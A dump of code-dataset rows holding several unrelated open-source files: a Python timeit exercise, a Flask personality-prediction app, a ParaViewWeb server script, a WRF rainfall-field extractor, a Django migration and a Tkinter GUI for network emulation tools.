Dataset columns (one entry per field of the rows below):
- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (2 to 616 chars)
- content_id: string (length 40)
- detected_licenses: list (0 to 69 items)
- license_type: string (2 classes)
- repo_name: string (5 to 118 chars)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (4 to 63 chars)
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64 (2.91k to 686M, nullable)
- star_events_count: int64 (0 to 209k)
- fork_events_count: int64 (0 to 110k)
- gha_license_id: string (23 classes)
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string (213 classes)
- src_encoding: string (30 classes)
- language: string (1 class)
- is_vendor: bool (2 classes)
- is_generated: bool (2 classes)
- length_bytes: int64 (2 to 10.3M)
- extension: string (246 classes)
- content: string (2 to 10.3M chars)
- authors: list (1 item)
- author_id: string (0 to 212 chars)
b8deb2b9dbb51c31d7e0bd2d422a20c182cb5525
|
a34745efeb435a93309fb789b6bf03c031a5c820
|
/compchallenge2b.py
|
f634c6885e1ef4b0b0cfcb1e62472d1af9e93340
|
[] |
no_license
|
brunoreyes/python_fundamentals
|
5e87358a10f674e5a049aa4c5ae6a0108cd72a8e
|
9fa2b341a5b5c954a6a1a77aa36ee6ef9fe70daa
|
refs/heads/master
| 2023-01-20T23:32:49.772268
| 2020-11-17T04:51:10
| 2020-11-17T04:51:10
| 302,809,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,835
|
py
|
import timeit
# timeit is good for comparing the speeds of multiple lines of code rather than finding the exact speed
# "setup" is preferably way to give timeit access to global variables
# garbage collection
# By default, timeit() temporarily turns off garbage collection during the timing.
# The advantage of this approach is that it makes independent timings more comparable.
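# --- Illustrative aside (not part of the original exercise): the basic timeit pattern,
# timing a small statement with shared set-up code passed in via the "setup" string.
_example_time = timeit.timeit('[n * n for n in range(100)]', setup='import gc; gc.enable()', number=1000)
print("example list comprehension timing:", _example_time)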
setup = """\
gc.enable()
locations = {0: "You are sitting in front of a computer learning Python",
1: "You are standing at the end of a road before a small brick building",
2: "You are at the top of a hill",
3: "You are inside a building, a well house for a small stream",
4: "You are in a valley beside a stream",
5: "You are in the forest"}
exits = {0: {"Q": 0},
1: {"W": 2, "E": 3, "N": 5, "S": 4, "Q": 0},
2: {"N": 5, "Q": 0},
3: {"W": 1, "Q": 0},
4: {"N": 1, "W": 2, "Q": 0},
5: {"W": 2, "S": 1, "Q": 0}}
"""
locations = {0: "You are sitting in front of a computer learning Python",
1: "You are standing at the end of a road before a small brick building",
2: "You are at the top of a hill",
3: "You are inside a building, a well house for a small stream",
4: "You are in a valley beside a stream",
5: "You are in the forest"}
exits = {0: {"Q": 0},
1: {"W": 2, "E": 3, "N": 5, "S": 4, "Q": 0},
2: {"N": 5, "Q": 0},
3: {"W": 1, "Q": 0},
4: {"N": 1, "W": 2, "Q": 0},
5: {"W": 2, "S": 1, "Q": 0}}
# print("nested for loops")
# print("----------------")
# nested_loop = """\
def nested_loop():
result= []
for loc in sorted(locations):
exits_to_destination_1 = []
for xit in exits:
if loc in exits[xit].values():
exits_to_destination_1.append((xit, locations[xit]))
result.append(exits_to_destination_1)
# print the result before returning
for x in result:
pass # recall pass doesn't do anything but is necessary to make a for loop valid
return result
# print("Locations leading to {}".format(loc), end='\t')
# print(exits_to_destination_1)
# """
print()
# print("List comprehension inside a for loop")
# print("------------------------------------")
# loop_comp = """\
def loop_comp():
result = []
for loc in sorted(locations):
exits_to_destination_2 = [(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
result.append(exits_to_destination_2)
# print the result before returning
for x in result:
pass
return result
# print("Locations leading to {}".format(loc), end='\t')
# print(exits_to_destination_2)
# """
# print()
# print("nested comprehension")
# print("--------------------")
# nested_comp = """\
def nested_comp():
exits_to_destination_3 = [[(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
for loc in sorted(locations)]
# print the result before returning
for x in exits_to_destination_3:
pass
return exits_to_destination_3
# print(exits_to_destination_3)
# print()
# for index, loc in enumerate(exits_to_destination_3):
# print("Locations leading to {}".format(index), end='\t')
# print(loc)
# """
def nested_gen():
exits_to_destination_3 = ([(xit, locations[xit]) for xit in exits if loc in exits[xit].values()]
for loc in sorted(locations))
# print the result before returning
for x in exits_to_destination_3:
pass
return exits_to_destination_3
# result_1 = timeit.timeit(nested_loop, globals=globals(), number=1000) # globals allows anything defined in the module
# to be available to this snippet; the default number is 1,000,000 so to save time we decreased it to 1000
print(nested_loop())
print(loop_comp())
print(nested_comp())
print(nested_gen())
result_1 = timeit.timeit(nested_loop, setup, number=1000) # the preferred way to pass shared set-up code is via "setup"
result_2 = timeit.timeit(loop_comp, setup, number=1000)
result_3 = timeit.timeit(nested_comp, setup, number=1000)
result_4 = timeit.timeit(nested_gen, setup, number=1000)
# apply common sense when reading these timings rather than treating them as precise statistics
print("Nested loop:\t{}".format(result_1))
print("Loop comprehension:\t{}".format(result_2))
print("Nested comprehension:\t{}".format(result_3))
print("Nested generator:\t{}".format(result_4)) # the nested generator is the fastest here
# because it never builds the full list of results; it only creates the generator object
# and iterates over it, producing one item at a time.
# This is the usual speed/memory trade-off: a list comprehension builds the whole list
# in memory, while a generator is memory-efficient because it yields items lazily.
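# --- Illustrative aside on that trade-off (not part of the original exercise): a list
# comprehension materialises every element up front, while the equivalent generator
# object stays small because it produces items lazily.
import sys
_list_size = sys.getsizeof([n for n in range(1000)])
_gen_size = sys.getsizeof(n for n in range(1000))
print("list object: {} bytes, generator object: {} bytes".format(_list_size, _gen_size))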
|
[
"bruno619reyes@gmail.com"
] |
bruno619reyes@gmail.com
|
d4ad983bb64d5751121ab96f0b31f78bdb862868
|
b544a6d23a19f19a5a4ba41f3e002dc6666ec220
|
/tyche/route/__init__.py
|
1b2bd234a0a622503b44f05816266b86b76b1e58
|
[] |
no_license
|
EternalZing/Tyche-Server
|
2429b7a0cf952ae972f8f2de0ac085220984968a
|
b29b4fd3b5aea23127f3198c464e3c6421ae9c96
|
refs/heads/master
| 2021-05-05T12:56:09.266103
| 2018-02-08T07:55:36
| 2018-02-08T07:55:36
| 118,345,047
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
from .rules_r import rule
|
[
"445625470@qq.com"
] |
445625470@qq.com
|
1a978bc0c5339f155784d67e949cf1b613a17034
|
112b6fbda45328775cde667d084f7c4a2c5898bf
|
/app.py
|
9a3521caf6c87e0927ff12566f8c63d9f210161a
|
[] |
no_license
|
jenienam/Online-Personality-App
|
5a93fe37075198bf73cdb70f45dac43ed97a8125
|
1d913f4d9e6bc00beb358153b3f91234cd0176da
|
refs/heads/master
| 2022-12-16T05:27:19.138811
| 2020-09-17T07:17:11
| 2020-09-17T07:17:11
| 287,020,047
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,432
|
py
|
# Dependencies
import numpy as np
from flask import Flask, request, render_template
import requests
from web_scraper import redditScraper, twitterScraper
from data_cleaning import calculateModelParameters
from model import personalityTypeResult
app = Flask(__name__)
@app.route('/')
def home():
return (render_template('index.html'))
@app.route('/reddit',methods = ['POST', 'GET'])
def predict_reddit():
if request.method == 'POST':
username = request.form['reddit-username']
comments = redditScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/twitter',methods = ['POST', 'GET'])
def predict_twitter():
if request.method == 'POST':
username = request.form['twitter-username']
comments = twitterScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/data')
def data():
return (render_template('data.html'))
@app.route('/about')
def about():
return (render_template('about.html'))
if __name__ == "__main__":
app.run(debug=True)
|
[
"jenien@uci.edu"
] |
jenien@uci.edu
|
015c735e062ac63dde157d1b06e700b8009e14ce
|
8a1241ac8ad91672aec81c878f2165a7678a1ad6
|
/Web/Applications/Visualizer/server/pv_web_visualizer.py
|
84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0
|
[
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] |
permissive
|
lmynsberge/ParaView
|
d9fbd0f4da197bc96172be8697ced76fe73852bf
|
2a68ee496949becf499742dfdbecb41b1eda81a7
|
refs/heads/master
| 2021-01-22T16:18:25.241194
| 2013-11-11T15:01:02
| 2013-11-11T15:01:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,203
|
py
|
r"""
This module is a ParaViewWeb server application.
The following command line illustrates how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
--load-file tries to load the file relative to data-dir if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script comes with a set of standard arguments that
can be overridden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
By default, this variable is empty, which means that we rely on another server
to deliver the static content and the current process focuses only on the
WebSocket connectivity of clients.
--authKey vtkweb-secret
Secret key that should be provided by the client to allow it to make any
WebSocket communication. If none is given, the client will assume that the
server expects "vtkweb-secret" as the secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
# Extract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
|
[
"sebastien.jourdain@kitware.com"
] |
sebastien.jourdain@kitware.com
|
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93
|
021a3dff055d4b3e40aafc63f0029dc280466233
|
/db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py
|
e2bed1eb35b657a3592bea9d212fe72a3c8b6482
|
[] |
no_license
|
shadhini/curw_helpers
|
45efe90d887c702b3a3f5877163647e220d230e4
|
101d896f8b589b478ef146b5b4dd99ec24f2dc84
|
refs/heads/master
| 2021-07-03T02:53:13.398052
| 2020-10-28T03:39:58
| 2020-10-28T03:39:58
| 185,217,580
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,854
|
py
|
#!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
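# --- Illustrative usage of the helper above (hypothetical config values, not the real
# deployment configuration):
_example_config = {"host": "localhost", "user": "curw", "password": "secret", "db": "curw_fcst", "port": 3306}
_example_host = read_attribute_from_config_file("host", _example_config)  # returns "localhost"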
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
Usage: python gen_rfield_kelani_basin_parallelized_optimized_with_past_future.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
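# --- Illustrative invocation assembled from the options documented in usage()
# (the model/version/sim_tag values below are examples only):
_example_command = ["python", "gen_rfield_kelani_basin_parallelized_optimized.py", "-m", "WRF_A,WRF_C", "-v", "v4", "-s", "evening_18hrs"]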
if __name__=="__main__":
my_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model is None or wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour =re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
my_pool = mp_pool = mp.Pool(mp.cpu_count())  # keep a handle so the pool is closed in the finally block
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if my_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
|
[
"jshadhiniaseka@gmail.com"
] |
jshadhiniaseka@gmail.com
|
68ecfff4ba3f11e8600cdf732af4fbb73db1d9a6
|
e07fc6fb419c1ce0616478ae1a59f9d70e353984
|
/src/hqmanager/parser.py
|
0db9f6249ad53d892fa9f580b66afaa49bef0d56
|
[
"MIT"
] |
permissive
|
herqles-io/hq-manager
|
9e647bf874411279cb47f162c0c2049f984ce6c5
|
ec4a37760a7d0a52128b66eb264eb25998c6a9d1
|
refs/heads/master
| 2021-01-23T08:38:32.203593
| 2015-08-11T18:50:42
| 2015-08-11T18:50:42
| 40,308,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 343
|
py
|
import argparse
import hqmanager
description = """Some description here"""
epilog = """Some epilog here"""
parser = argparse.ArgumentParser(
description=description,
epilog=epilog)
parser.add_argument('-c', '--config', required=True, help='Config file to use')
parser.set_defaults(func=hqmanager.main)
# args = parser.parse_args()
|
[
"rbelgrave@covermymeds.com"
] |
rbelgrave@covermymeds.com
|
1cc46aac55864041c24fc7764d0bacccf6e6b983
|
c5ccca7b5af562e10c91a4dfe451da0990e73edf
|
/Test2-1/users/migrations/0006_auto_20200402_1057.py
|
e21fdce120ed0f09058b2ad3cd83f4ed31c5a5a0
|
[] |
no_license
|
170400529/zwj
|
ac29e788d47f0c1381527bbc101711c656d29e29
|
66257a8028fefb9a016e0dc04b99c9d2daed07ee
|
refs/heads/master
| 2021-05-20T20:25:30.200353
| 2020-04-02T09:05:49
| 2020-04-02T09:05:49
| 252,406,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
# Generated by Django 3.0.4 on 2020-04-02 02:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20200402_1056'),
]
operations = [
migrations.AlterField(
model_name='question',
name='level',
field=models.CharField(choices=[('1', 'easy'), ('3', 'difficult'), ('2', 'general')], max_length=10, null=True, verbose_name='等级'),
),
]
|
[
"2583145870@qq.com"
] |
2583145870@qq.com
|
e40f1eef29e7514039f8878f249ee57807933519
|
a1d986433707e5a645347921f0b941176319ec15
|
/venv/bin/easy_install
|
6f048b0a8a3450324440a6e904b07daf6a076319
|
[] |
no_license
|
ezanat1/WineML
|
edba7ffe3d0353144f5f769e20e75af79b0ea234
|
7f77c70d0da9660ce60b9f5f94796b452024c870
|
refs/heads/master
| 2020-05-16T23:13:37.708689
| 2018-12-07T01:26:10
| 2018-12-07T01:26:10
| 183,357,538
| 1
| 0
| null | 2019-04-25T04:40:53
| 2019-04-25T04:40:52
| null |
UTF-8
|
Python
| false
| false
| 281
|
#!/Users/ezanatesfaye/Desktop/WineRecommendation/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ezanatesfaye@Ezanas-MacBook-Pro.local"
] |
ezanatesfaye@Ezanas-MacBook-Pro.local
|
|
bd9e112b5ba6b811a80a6b9ccc5271dbdd0cc491
|
907ea8b2e3af5035ee640c95c646d6a04a192d41
|
/TTools/TTools.py
|
43b91782b12f7b6b5ed03dfe17eae3ca57566dd8
|
[] |
no_license
|
cuchy/TTools
|
8869ee47d3c489d95fa2c8b454757aee521cd705
|
37527c5a60360f0ddef7398a34296ab332810e0c
|
refs/heads/master
| 2021-01-11T10:39:05.100786
| 2016-11-05T21:25:29
| 2016-11-05T21:25:29
| 72,948,537
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,785
|
py
|
#!/usr/bin/python
# -*- coding: iso-8859-1 -*-
# "========================================================================="
# " UDELAR - Facultad de Ingeniería "
# " Proyecto de Grado - Año 2016 "
# " Autores: Viviana Solla & Gabriel Jambrina "
# "========================================================================="
import Tkinter,tkFileDialog,ttk
import os
import sys
import ttkcalendar
class simpleapp_tk(Tkinter.Tk):
def __init__(self,parent):
Tkinter.Tk.__init__(self,parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.eval('tk::PlaceWindow %s center' % self.winfo_pathname(self.winfo_id()))
button1 = Tkinter.Button(self,text="Convertir archivo GML a XML",font=('times', 14, 'bold'), command=self.OnButtonClickB1)
button1.grid(column=0,row=1,columnspan=1,sticky='EW')
button2 = Tkinter.Button(self,text="Preparar emulación de Red", font=('times', 14, 'bold') , command=self.OnButtonClickB2)
button2.grid(column=0,row=2,columnspan=1,sticky='EW')
button3 = Tkinter.Button(self,text="Cargar Base de Datos Mysql",font=('times', 14, 'bold'), command=self.OnButtonClickB3)
button3.grid(column=0,row=3,columnspan=1,sticky='EW')
button4 = Tkinter.Button(self,text="Borrar archivos generados por bgpdump",font=('times', 14, 'bold'), command=self.OnButtonClickB4)
button4.grid(column=0,row=4,columnspan=1,sticky='EW')
button5 = Tkinter.Button(self,text="Ejecutar MiniNExt",font=('times', 14, 'bold'), command=self.OnButtonClickB5)
button5.grid(column=0,row=5,columnspan=1,sticky='EW')
button6 = Tkinter.Button(self,text="Descargar trazas BGP",font=('times', 14, 'bold'), command=self.OnButtonClickB6)
button6.grid(column=0,row=6,columnspan=1,sticky='EW')
self.image = Tkinter.PhotoImage(file="img/exit.png")
button6 = Tkinter.Button(self, text="SALIR",font=('times', 14, 'bold'), image=self.image, anchor=Tkinter.SE, compound="right", command=quit)
button6.grid(column=0,row=7, sticky='EW')
self.labelVariable = Tkinter.StringVar()
self.label = Tkinter.Label(self,textvariable=self.labelVariable,anchor="w",fg="white",bg="green")
self.label.grid(column=0,row=10,columnspan=2,sticky='EW')
self.labelVariable.set(" TTools v1.0")
self.grid_columnconfigure(0,weight=1)
self.resizable(True,False)
##################BOTON B1###########################
def OnButtonClickB1(self):
self.labelVariable.set(" Convertidor de GML a XML" )
file = tkFileDialog.askopenfile(parent=self,mode='rb',title='Selecciona el archivo a convertir')
if file != None:
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("Numero de Sistema Autónomo")
print "¡File OK!"
self.abs_path = os.path.abspath(file.name)
#dirActual = os.getcwd()
Tkinter.Label(self.root, text="Ingrese el número de AS", font=('arial', 12, 'bold'), width=30).pack(pady=10)
self.e = Tkinter.Entry(self.root, width=10)
self.e.pack(pady=10)
b = Tkinter.Button(self.root, text="OK",font=('times', 12, 'bold'), command=self.onClickB1)
b.pack(pady=20)
def onClickB1(self):
os.system("python GMLtoXMLconverter.py "+self.abs_path+" "+self.e.get())
print "ASN= ", self.e.get()
self.root.destroy()
self.labelVariable.set("Archivo convertido con exito")
##################BOTON B2###########################
def OnButtonClickB2(self):
self.routersName = []
self.lstASN = []
self.labelVariable.set(" Generador de archivos de configuracion" )
file = tkFileDialog.askopenfile(parent=self,mode='rb',title='Seleccione el archivo XML que representa la topología')
if file != None:
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
#self.root.resizable(width=False, height=False)
self.root.grid()
self.root.title("Seleccion routers de borde")
print "¡File OK!"
self.abs_path = os.path.abspath(file.name) #os.path.basename(file.name)
#Read the routers of the AS
linea = file.readline()
while not ("<topology>" in linea):
linea = file.readline()
while not ("</nodes>" in linea):
if ("<node id=" in linea):
auxLinea = linea.split("\"")
r = auxLinea[1]
r = '_'.join(r.split())
if not r in self.routersName:
self.routersName.append(r)
linea = file.readline()
#Show the list of routers
self.label1 = Tkinter.Label(self.root,text= "Selecciones los routers que mantienen sesiones eBGP",height=2, width=55,font=('arial', 12, 'bold'));self.label1.pack()
self.s1 = Tkinter.Scrollbar(self.root)
self.s2 = Tkinter.Scrollbar(self.root)
self.L1 = Tkinter.Listbox(self.root, height=20, font=('arial', 11))
self.L2 = Tkinter.Listbox(self.root, height=20)
self.s1.pack(side=Tkinter.LEFT, fill=Tkinter.Y)
self.s2.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)
self.L1.pack(side=Tkinter.LEFT, fill=Tkinter.Y)
self.L2.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)
self.s1.config(command=self.L1.yview)
self.s2.config(command=self.L2.yview)
self.L1.config(yscrollcommand=self.s1.set)
self.L2.config(yscrollcommand=self.s2.set)
for i in self.routersName:
self.L1.insert(Tkinter.END, i)
self.L1.select_set(0)
self.b3 = Tkinter.Button(self.root, text="Seleccionar =>", command=self.onClickB3, height=2, width=10, bg="green", font=('arial', 12));self.b3.pack()
self.b4 = Tkinter.Button(self.root, text="<= Quitar", command=self.onClickB4, height=2, width=10, bg="red", font=('arial', 12));self.b4.pack()
self.b2 = Tkinter.Button(self.root, text="Siguiente", command=self.onClickB2, height=2, width=10, font=('times', 12));self.b2.pack(side="bottom")
def onClickB3(self):
index = int(self.L1.curselection()[0])
self.L2.insert(Tkinter.END, self.routersName[index])
self.L2.select_set(self.L2.size()-1)
def onClickB4(self):
index = self.L2.curselection()[0]
self.L2.delete(index)
self.L2.select_set(self.L2.size()-1)
def onClickB2(self):
self.L1.pack_forget();self.s1.pack_forget();self.L2.pack_forget();self.s2.pack_forget();self.b2.pack_forget();self.b3.pack_forget();
self.b4.pack_forget();self.label1.pack_forget();
self.root.title("ASN de Vecinos eBGP")
self.label2 = Tkinter.Label(self.root,height=2,width=30,font=('arial', 15, 'bold'),text=self.L2.get(0, Tkinter.END)[0],anchor=Tkinter.CENTER);self.label2.pack()
self.e = Tkinter.Entry(self.root, font=("Calibri",12),justify="center",width=8,bg="#1E6FBA")
self.asn=65000
self.e.insert(Tkinter.END, self.asn); self.e.pack()
self.index=1;
self.b5 = Tkinter.Button(self.root, height=1, width=8, text="Siguiente", command=self.onClickB5, font=('arial', 12));self.b5.pack(pady=10)
def onClickB5(self):
self.asn+=10
self.lstASN.insert(self.index-1,self.e.get())
self.e.delete(0, Tkinter.END); self.e.insert(Tkinter.END, self.asn)
self.label2.config(text=self.L2.get(0, Tkinter.END)[self.index] )
self.index+=1
if (self.L2.size() == self.index):
self.b5.pack_forget()
self.b6 = Tkinter.Button(self.root, height=1, width=8, text="Terminar", command=self.onClickB6, font=('arial', 12)); self.b6.pack(pady=10)
def onClickB6(self):
self.lstASN.insert(self.index-1,self.e.get())
comando="python emulGen.py "+self.abs_path+" "
counter=0
for i in self.L2.get(0, Tkinter.END):
counter+=1
if (counter==self.index):
comando+=i+" "
else:
comando+=i+","
counter=0
for i in self.lstASN :
counter+=1
if (counter==self.index):
comando+=i+" "
else:
comando+=i+","
counter=0;
os.system(comando)
#print comando
self.root.destroy()
self.labelVariable.set(" Topology Tools v1.0")
#####################BOTON B3#########################
def OnButtonClickB3(self):
self.labelVariable.set("Cargar bases de datos Mysql" )
self.directory = tkFileDialog.askdirectory(parent=self,title='Seleccione la ubicacion de la carpeta mininext')
if self.directory != "":
self.root = Tkinter.Tk()
self.root.eval('tk::PlaceWindow %s center' % self.root.winfo_pathname(self.root.winfo_id()))
self.root.title("Nobre de la base de datos")
